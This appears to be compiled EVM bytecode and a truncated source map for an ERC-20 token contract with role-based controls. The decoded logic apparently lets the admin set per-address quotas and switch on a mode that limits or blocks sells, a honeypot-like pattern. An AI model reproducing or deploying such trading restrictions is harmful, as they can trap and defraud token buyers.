65b60405180910390f35b610431600480360381019061042c9190611d77565b610b96565b005b61044d60048036038101906104489190611ee6565b610c38565b005b61046960048036038101906104649190611f58565b610c5a565b005b6104856004803603810190610480919061212f565b610cbe565b6040516104929190611df7565b60405180910390f35b6104a3610d40565b005b6060600680546104b49061219a565b80601f01602080910402602001604051908101604052809291908181526020018280546104e09061219a565b801561052b5780601f106105025761010080835404028352916020019161052b565b820191905f5260205f20905b81548152906001019060200180831161050e57829003601f168201915b5050505050905090565b5f8061053f610d68565b905061054c818585610d6f565b600191505092915050565b5f600554905090565b5f8061056a610d68565b9050610577858285610d81565b610582858585610e13565b60019150509392505050565b5f805f8381526020019081526020015f20600301549050919050565b5f801b6105b681610f0e565b6105be61066e565b600a6105ca9190612326565b826105d59190612370565b5f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505050565b6106558261058e565b61065e81610f0e565b6106688383610f22565b50505050565b5f6012905090565b61067e610d68565b73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16146106e2576040517f6697b23200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6106ec828261100b565b505050565b5f801b6106fd81610f0e565b6107277f545241444500000000000000000000000000000000000000000000000000000083610f22565b505f805f7f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505050565b5f801b6107ab81610f0e565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f805f8481526020019081526020015f205f015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16905092915050565b6060600780546108bb9061219a565b80601f01602080910402602001604051908101604052809291908181526020018280546108e79061219a565b80156109325780601f1061090957610100808354040283529160200191610932565b820191905f5260205f20905b81548152906001019060200180831161091557829003601f168201915b5050505050905090565b5f801b61094881610f0e565b5f805f7f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206002015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505050565b5f801b81565b5f806109cf610d68565b90506109dc818585610e13565b600191505092915050565b5f801b6109f381610f0e565b600160085f6101000a81548160ff02191690831515021790555050565b5f801b610a1c81610f0e565b5f8490505f8173ffffffffffffffffffffffffffffffffffffffff1663313ce5676040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a6a573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a8e91906123db565b60ff1690505f5b85518160ff161015610b69575f82600a610aaf9190612406565b86610aba9190612370565b90508373ffffffffffffffffffffffffffffffffffffffff1663a9059cbb888460ff1681518110610aee57610aed612450565b5b6020026020010151836040518363ffffffff1660e01b8152600401610b1492919061248c565b6020604051808303815f875af1158015610b30573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610b5491906124dd565b50508080610b6190612508565b915050610a95565b50505050505050565b7f545241444500000000000000000000000000000000000000000000000000000081565b5f801b610ba281610f0e565b610baa61066e565b600a610bb69190612326565b82610bc19190612370565b5f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206002015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505050565b610c418261058e565b610c4a81610f0e565b610c54838361100b565b50505050565b5f801b610c6681610f0e565b6001805f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b5f60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f801b610d4c81610f0e565b5f60085f6101000a81548160ff02191690831515021790555050565b5f33905090565b610d7c83838360016110f4565b505050565b5f610d8c8484610cbe565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e0d5781811015610dfe578281836040517ffb8f41b2000000000000000000000000000000000000000000000000000000008152600401610df593929190612530565b60405180910390fd5b610e0c84848484035f6110f4565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e83575f6040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401610e7a9190612565565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ef3575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401610eea9190612565565b60405180910390fd5b610efe8383836112c3565b610f0983838361139a565b505050565b610f1f81610f1a610d68565b6115b6565b50565b5f610f2d8383610849565b6110015760015f808581526020019081526020015f205f015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550610f9e610d68565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16847f2f8788117e7eff1d82e926ec794901d17c78024a50270940304540a733656f0d60405160405180910390a460019050611005565b5f90505b92915050565b5f6110168383610849565b156110ea575f805f8581526020019081526020015f205f015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550611087610d68565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16847ff6391f5c32d9c69d2a47ea670b442974b53935d1edc7fd64eb21e047a839171b60405160405180910390a4600190506110ee565b5f90505b92915050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603611164575f6040517fe602df0500000000000000000000000000000000000000000000000000000000815260040161115b9190612565565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111d4575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016111cb9190612565565b60405180910390fd5b8160045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555080156112bd578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516112b49190611df7565b60405180910390a35b50505050565b60025f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611326576113218282611607565b611395565b60025f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611389576113848382611816565b611394565b6113938382611816565b5b5b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036113ea578060055f8282546113de919061257e565b925050819055506114ba565b5f60035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015611474578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161146b93929190612530565b60405180910390fd5b81810360035f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611501578060055f828254039250508190555061154c565b8060035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516115a99190611df7565b60405180910390a3505050565b6115c08282610849565b6116035780826040517fe2517d3f0000000000000000000000000000000000000000000000000000000081526004016115fa9291906125b1565b60405180910390fd5b5050565b61161082611c27565b156117455760015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16156117075761168e7f545241444500000000000000000000000000000000000000000000000000000083610f22565b50805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611744565b816040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161173b9190612565565b60405180910390fd5b5b61176f7f545241444500000000000000000000000000000000000000000000000000000083610849565b6118125761179d7f545241444500000000000000000000000000000000000000000000000000000083610f22565b50805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b5050565b6118225f801b83610849565b611c235760085f9054906101000a900460ff16156119ef57805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206002015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054101580156118b757505f81115b156119ad57805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206002015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461193691906125d8565b5f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206002015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506119ea565b816040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016119e19190612565565b60405180910390fd5b611c22565b805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205410158015611a6c57505f81115b15611b6257805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054611aeb91906125d8565b5f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611c21565b5f81111580611bde5750805f807f545241444500000000000000000000000000000000000000000000000000000081526020019081526020015f206001015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054105b15611c2057816040517f96c6fd1e000000000000000000000000000000000000000000000000000000008152600401611c179190612565565b60405180910390fd5b5b5b5b5050565b5f808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f611c8b82611c49565b611c958185611c53565b9350611ca5818560208601611c63565b611cae81611c71565b840191505092915050565b5f6020820190508181035f830152611cd18184611c81565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611d1382611cea565b9050919050565b611d2381611d09565b8114611d2d575f80fd5b50565b5f81359050611d3e81611d1a565b92915050565b5f819050919050565b611d5681611d44565b8114611d60575f80fd5b50565b5f81359050611d7181611d4d565b92915050565b5f8060408385031215611d8d57611d8c611ce2565b5b5f611d9a85828601611d30565b9250506020611dab85828601611d63565b9150509250929050565b5f8115159050919050565b611dc981611db5565b82525050565b5f602082019050611de25f830184611dc0565b92915050565b611df181611d44565b82525050565b5f602082019050611e0a5f830184611de8565b92915050565b5f805f60608486031215611e2757611e26611ce2565b5b5f611e3486828701611d30565b9350506020611e4586828701611d30565b9250506040611e5686828701611d63565b9150509250925092565b5f819050919050565b611e7281611e60565b8114611e7c575f80fd5b50565b5f81359050611e8d81611e69565b92915050565b5f60208284031215611ea857611ea7611ce2565b5b5f611eb584828501611e7f565b91505092915050565b611ec781611e60565b82525050565b5f602082019050611ee05f830184611ebe565b92915050565b5f8060408385031215611efc57611efb611ce2565b5b5f611f0985828601611e7f565b9250506020611f1a85828601611d30565b9150509250929050565b5f60ff82169050919050565b611f3981611f24565b82525050565b5f602082019050611f525f830184611f30565b92915050565b5f60208284031215611f6d57611f6c611ce2565b5b5f611f7a84828501611d30565b91505092915050565b5f80fd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b611fbd82611c71565b810181811067ffffffffffffffff82111715611fdc57611fdb611f87565b5b80604052505050565b5f611fee611cd9565b9050611ffa8282611fb4565b919050565b5f67ffffffffffffffff82111561201957612018611f87565b5b602082029050602081019050919050565b5f80fd5b5f61204061203b84611fff565b611fe5565b905080838252602082019050602084028301858111156120635761206261202a565b5b835b8181101561208c57806120788882611d30565b845260208401935050602081019050612065565b5050509392505050565b5f82601f8301126120aa576120a9611f83565b5b81356120ba84826020860161202e565b91505092915050565b5f805f606084860312156120da576120d9611ce2565b5b5f6120e786828701611d30565b935050602084013567ffffffffffffffff81111561210857612107611ce6565b5b61211486828701612096565b925050604061212586828701611d63565b9150509250925092565b5f806040838503121561214557612144611ce2565b5b5f61215285828601611d30565b925050602061216385828601611d30565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806121b157607f821691505b6020821081036121c4576121c361216d565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111561224c57808604811115612228576122276121ca565b5b60018516156122375780820291505b8081029050612245856121f7565b945061220c565b94509492505050565b5f82612264576001905061231f565b81612271575f905061231f565b81600181146122875760028114612291576122c0565b600191505061231f565b60ff8411156122a3576122a26121ca565b5b8360020a9150848211156122ba576122b96121ca565b5b5061231f565b5060208310610133831016604e8410600b84101617156122f55782820a9050838111156122f0576122ef6121ca565b5b61231f565b6123028484846001612203565b92509050818404811115612319576123186121ca565b5b81810290505b9392505050565b5f61233082611d44565b915061233b83611f24565b92506123687fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484612255565b905092915050565b5f61237a82611d44565b915061238583611d44565b925082820261239381611d44565b915082820484148315176123aa576123a96121ca565b5b5092915050565b6123ba81611f24565b81146123c4575f80fd5b50565b5f815190506123d5816123b1565b92915050565b5f602082840312156123f0576123ef611ce2565b5b5f6123fd848285016123c7565b91505092915050565b5f61241082611d44565b915061241b83611d44565b92506124487fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484612255565b905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b61248681611d09565b82525050565b5f60408201905061249f5f83018561247d565b6124ac6020830184611de8565b9392505050565b6124bc81611db5565b81146124c6575f80fd5b50565b5f815190506124d7816124b3565b92915050565b5f602082840312156124f2576124f1611ce2565b5b5f6124ff848285016124c9565b91505092915050565b5f61251282611f24565b915060ff8203612525576125246121ca565b5b600182019050919050565b5f6060820190506125435f83018661247d565b6125506020830185611de8565b61255d6040830184611de8565b949350505050565b5f6020820190506125785f83018461247d565b92915050565b5f61258882611d44565b915061259383611d44565b92508282019050808211156125ab576125aa6121ca565b5b92915050565b5f6040820190506125c45f83018561247d565b6125d16020830184611ebe565b9392505050565b5f6125e282611d44565b91506125ed83611d44565b9250828203905081811115612605576126046121ca565b5b9291505056fea264697066735822122019065e879137fd7e5f4a9f70134d8d6639df6fdc76625817f25fd02f0f9e435b64736f6c634300081a0033

Deployed Bytecode Sourcemap

34244:786:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14887:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17221:222;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15989:99;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18053:283;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10656:122;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20966:180;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11088:170;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15840:84;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12289:274;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;21153:157;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;20849:109;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;16151:118;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9631:179;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15097:95;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21505:120;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9099:49;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16474:182;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21632:90;;;:::i;:::-;;21834:419;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9155:48;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21317:180;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11551:172;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;20731:110;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;16719:183;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21729:92;;;:::i;:::-;;14887:91;14932:13;14965:5;14958:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14887:91;:::o;17221:222::-;17321:4;17343:13;17359:12;:10;:12::i;:::-;17343:28;;17382:31;17391:5;17398:7;17407:5;17382:8;:31::i;:::-;17431:4;17424:11;;;17221:222;;;;:::o;15989:99::-;16041:7;16068:12;;16061:19;;15989:99;:::o;18053:283::-;18174:4;18191:15;18209:12;:10;:12::i;:::-;18191:30;;18232:37;18248:4;18254:7;18263:5;18232:15;:37::i;:::-;18280:26;18290:4;18296:2;18300:5;18280:9;:26::i;:::-;18324:4;18317:11;;;18053:283;;;;;:::o;10656:122::-;10721:7;10748:6;:12;10755:4;10748:12;;;;;;;;;;;:22;;;10741:29;;10656:122;;;:::o;20966:180::-;9144:4;21051:18;;9503:16;9514:4;9503:10;:16::i;:::-;21128:10:::1;:8;:10::i;:::-;21124:2;:14;;;;:::i;:::-;21115:6;:23;;;;:::i;:::-;21087:6;:13:::0;9187:16:::1;21087:13;;;;;;;;;;;:16;;:25;21104:7;21087:25;;;;;;;;;;;;;;;:51;;;;20966:180:::0;;;:::o;11088:170::-;11189:18;11202:4;11189:12;:18::i;:::-;9503:16;9514:4;9503:10;:16::i;:::-;11225:25:::1;11236:4;11242:7;11225:10;:25::i;:::-;;11088:170:::0;;;:::o;15840:84::-;15889:5;15914:2;15907:9;;15840:84;:::o;12289:274::-;12428:12;:10;:12::i;:::-;12406:34;;:18;:34;;;12402:104;;12464:30;;;;;;;;;;;;;;12402:104;12518:37;12530:4;12536:18;12518:11;:37::i;:::-;;12289:274;;:::o;21153:157::-;9144:4;21205:18;;9503:16;9514:4;9503:10;:16::i;:::-;21236:26:::1;9187:16;21254:7;21236:10;:26::i;:::-;;21301:1;21273:6:::0;:13:::1;9187:16;21273:13;;;;;;;;;;;:16;;:25;21290:7;21273:25;;;;;;;;;;;;;;;:29;;;;21153:157:::0;;:::o;20849:109::-;9144:4;20900:18;;9503:16;9514:4;9503:10;:16::i;:::-;20945:5:::1;20930;:14;20936:7;20930:14;;;;;;;;;;;;;;;;:20;;;;;;;;;;;;;;;;;;20849:109:::0;;:::o;16151:118::-;16216:7;16243:9;:18;16253:7;16243:18;;;;;;;;;;;;;;;;16236:25;;16151:118;;;:::o;9631:179::-;9744:4;9773:6;:12;9780:4;9773:12;;;;;;;;;;;:20;;:29;9794:7;9773:29;;;;;;;;;;;;;;;;;;;;;;;;;9766:36;;9631:179;;;;:::o;15097:95::-;15144:13;15177:7;15170:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15097:95;:::o;21505:120::-;9144:4;21557:18;;9503:16;9514:4;9503:10;:16::i;:::-;21616:1:::1;21588:6:::0;:13:::1;9187:16;21588:13;;;;;;;;;;;:16;;:25;21605:7;21588:25;;;;;;;;;;;;;;;:29;;;;21505:120:::0;;:::o;9099:49::-;9144:4;9099:49;;;:::o;16474:182::-;16543:4;16560:13;16576:12;:10;:12::i;:::-;16560:28;;16599:27;16609:5;16616:2;16620:5;16599:9;:27::i;:::-;16644:4;16637:11;;;16474:182;;;;:::o;21632:90::-;9144:4;21671:18;;9503:16;9514:4;9503:10;:16::i;:::-;21710:4:::1;21702:5;;:12;;;;;;;;;;;;;;;;;;21632:90:::0;:::o;21834:419::-;9144:4;21966:18;;9503:16;9514:4;9503:10;:16::i;:::-;21997:12:::1;22018:6;21997:28;;22036:16;22055:6;:15;;;:17;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;22036:36;;;;22088:7;22083:163;22103:13;:20;22099:1;:24;;;22083:163;;;22145:12;22172:8;22168:2;:12;;;;:::i;:::-;22160:5;:20;;;;:::i;:::-;22145:35;;22195:6;:15;;;22211:13;22225:1;22211:16;;;;;;;;;;:::i;:::-;;;;;;;;22229:4;22195:39;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;22130:116;22125:3;;;;;:::i;:::-;;;;22083:163;;;;21986:267;;21834:419:::0;;;;:::o;9155:48::-;9187:16;9155:48;:::o;21317:180::-;9144:4;21402:18;;9503:16;9514:4;9503:10;:16::i;:::-;21479:10:::1;:8;:10::i;:::-;21475:2;:14;;;;:::i;:::-;21466:6;:23;;;;:::i;:::-;21438:6;:13:::0;9187:16:::1;21438:13;;;;;;;;;;;:16;;:25;21455:7;21438:25;;;;;;;;;;;;;;;:51;;;;21317:180:::0;;;:::o;11551:172::-;11653:18;11666:4;11653:12;:18::i;:::-;9503:16;9514:4;9503:10;:16::i;:::-;11689:26:::1;11701:4;11707:7;11689:11;:26::i;:::-;;11551:172:::0;;;:::o;20731:110::-;9144:4;20781:18;;9503:16;9514:4;9503:10;:16::i;:::-;20829:4:::1;20812:5:::0;:14:::1;20818:7;20812:14;;;;;;;;;;;;;;;;:21;;;;;;;;;;;;;;;;;;20731:110:::0;;:::o;16719:183::-;16835:7;16867:11;:18;16879:5;16867:18;;;;;;;;;;;;;;;:27;16886:7;16867:27;;;;;;;;;;;;;;;;16860:34;;16719:183;;;;:::o;21729:92::-;9144:4;21769:18;;9503:16;9514:4;9503:10;:16::i;:::-;21808:5:::1;21800;;:13;;;;;;;;;;;;;;;;;;21729:92:::0;:::o;3262:98::-;3315:7;3342:10;3335:17;;3262:98;:::o;25402:164::-;25521:37;25530:5;25537:7;25546:5;25553:4;25521:8;:37::i;:::-;25402:164;;;:::o;27211:603::-;27345:24;27372:25;27382:5;27389:7;27372:9;:25::i;:::-;27345:52;;27432:17;27412:16;:37;27408:399;;27489:5;27470:16;:24;27466:214;;;27571:7;27601:16;27640:5;27522:142;;;;;;;;;;;;;:::i;:::-;;;;;;;;27466:214;27723:57;27732:5;27739:7;27767:5;27748:16;:24;27774:5;27723:8;:57::i;:::-;27408:399;27334:480;27211:603;;;:::o;18847:383::-;18981:1;18965:18;;:4;:18;;;18961:88;;19034:1;19007:30;;;;;;;;;;;:::i;:::-;;;;;;;;18961:88;19077:1;19063:16;;:2;:16;;;19059:88;;19132:1;19103:32;;;;;;;;;;;:::i;:::-;;;;;;;;19059:88;19157:30;19171:4;19177:2;19181:5;19157:13;:30::i;:::-;19198:24;19206:4;19212:2;19216:5;19198:7;:24::i;:::-;18847:383;;;:::o;10025:105::-;10092:30;10103:4;10109:12;:10;:12::i;:::-;10092:10;:30::i;:::-;10025:105;:::o;13189:356::-;13293:4;13320:22;13328:4;13334:7;13320;:22::i;:::-;13315:223;;13391:4;13359:6;:12;13366:4;13359:12;;;;;;;;;;;:20;;:29;13380:7;13359:29;;;;;;;;;;;;;;;;:36;;;;;;;;;;;;;;;;;;13442:12;:10;:12::i;:::-;13415:40;;13433:7;13415:40;;13427:4;13415:40;;;;;;;;;;13477:4;13470:11;;;;13315:223;13521:5;13514:12;;13189:356;;;;;:::o;13789:357::-;13894:4;13920:22;13928:4;13934:7;13920;:22::i;:::-;13916:223;;;13991:5;13959:6;:12;13966:4;13959:12;;;;;;;;;;;:20;;:29;13980:7;13959:29;;;;;;;;;;;;;;;;:37;;;;;;;;;;;;;;;;;;14043:12;:10;:12::i;:::-;14016:40;;14034:7;14016:40;;14028:4;14016:40;;;;;;;;;;14078:4;14071:11;;;;13916:223;14122:5;14115:12;;13789:357;;;;;:::o;26433:486::-;26606:1;26589:19;;:5;:19;;;26585:91;;26661:1;26632:32;;;;;;;;;;;:::i;:::-;;;;;;;;26585:91;26709:1;26690:21;;:7;:21;;;26686:92;;26763:1;26735:31;;;;;;;;;;;:::i;:::-;;;;;;;;26686:92;26818:5;26788:11;:18;26800:5;26788:18;;;;;;;;;;;;;;;:27;26807:7;26788:27;;;;;;;;;;;;;;;:35;;;;26838:9;26834:78;;;26885:7;26869:31;;26878:5;26869:31;;;26894:5;26869:31;;;;;;:::i;:::-;;;;;;;;26834:78;26433:486;;;;:::o;19238:342::-;19369:13;;;;;;;;;;;19361:21;;:4;:21;;;19357:216;;19399:21;19409:2;19413:6;19399:9;:21::i;:::-;19357:216;;;19448:13;;;;;;;;;;;19442:19;;:2;:19;;;19438:135;;19478:25;19490:4;19496:6;19478:11;:25::i;:::-;19438:135;;;19536:25;19548:4;19554:6;19536:11;:25::i;:::-;19438:135;19357:216;19238:342;;;:::o;22575:1169::-;22715:1;22699:18;;:4;:18;;;22695:552;;22853:5;22837:12;;:21;;;;;;;:::i;:::-;;;;;;;;22695:552;;;22891:19;22913:9;:15;22923:4;22913:15;;;;;;;;;;;;;;;;22891:37;;22961:5;22947:11;:19;22943:117;;;23019:4;23025:11;23038:5;22994:50;;;;;;;;;;;;;:::i;:::-;;;;;;;;22943:117;23215:5;23201:11;:19;23183:9;:15;23193:4;23183:15;;;;;;;;;;;;;;;:37;;;;22876:371;22695:552;23277:1;23263:16;;:2;:16;;;23259:435;;23445:5;23429:12;;:21;;;;;;;;;;;23259:435;;;23662:5;23645:9;:13;23655:2;23645:13;;;;;;;;;;;;;;;;:22;;;;;;;;;;;23259:435;23726:2;23711:25;;23720:4;23711:25;;;23730:5;23711:25;;;;;;:::i;:::-;;;;;;;;22575:1169;;;:::o;10266:201::-;10355:22;10363:4;10369:7;10355;:22::i;:::-;10350:110;;10434:7;10443:4;10401:47;;;;;;;;;;;;:::i;:::-;;;;;;;;10350:110;10266:201;;:::o;19588:481::-;19664:19;19675:7;19664:10;:19::i;:::-;19660:260;;;19704:5;:14;19710:7;19704:14;;;;;;;;;;;;;;;;;;;;;;;;;19700:209;;;19739:26;9187:16;19757:7;19739:10;:26::i;:::-;;19812:6;19784;:13;9187:16;19784:13;;;;;;;;;;;:16;;:25;19801:7;19784:25;;;;;;;;;;;;;;;:34;;;;19700:209;;;19885:7;19866:27;;;;;;;;;;;:::i;:::-;;;;;;;;19700:209;19660:260;19935:23;9187:16;19950:7;19935;:23::i;:::-;19930:132;;19975:26;9187:16;19993:7;19975:10;:26::i;:::-;;20044:6;20016;:13;9187:16;20016:13;;;;;;;;;;;:16;;:25;20033:7;20016:25;;;;;;;;;;;;;;;:34;;;;19930:132;19588:481;;:::o;20077:646::-;20152:33;9144:4;20160:18;;20180:4;20152:7;:33::i;:::-;20148:568;;20211:5;;;;;;;;;;;20207:509;;;20263:6;20237;:13;9187:16;20237:13;;;;;;;;;;;:16;;:22;20254:4;20237:22;;;;;;;;;;;;;;;;:32;;:46;;;;;20282:1;20273:6;:10;20237:46;20233:215;;;20354:6;20329;:13;9187:16;20329:13;;;;;;;;;;;:16;;:22;20346:4;20329:22;;;;;;;;;;;;;;;;:31;;;;:::i;:::-;20304:6;:13;9187:16;20304:13;;;;;;;;;;;:16;;:22;20321:4;20304:22;;;;;;;;;;;;;;;:56;;;;20233:215;;;20427:4;20408:24;;;;;;;;;;;:::i;:::-;;;;;;;;20233:215;20207:509;;;20495:6;20469;:13;9187:16;20469:13;;;;;;;;;;;:16;;:22;20486:4;20469:22;;;;;;;;;;;;;;;;:32;;:46;;;;;20514:1;20505:6;: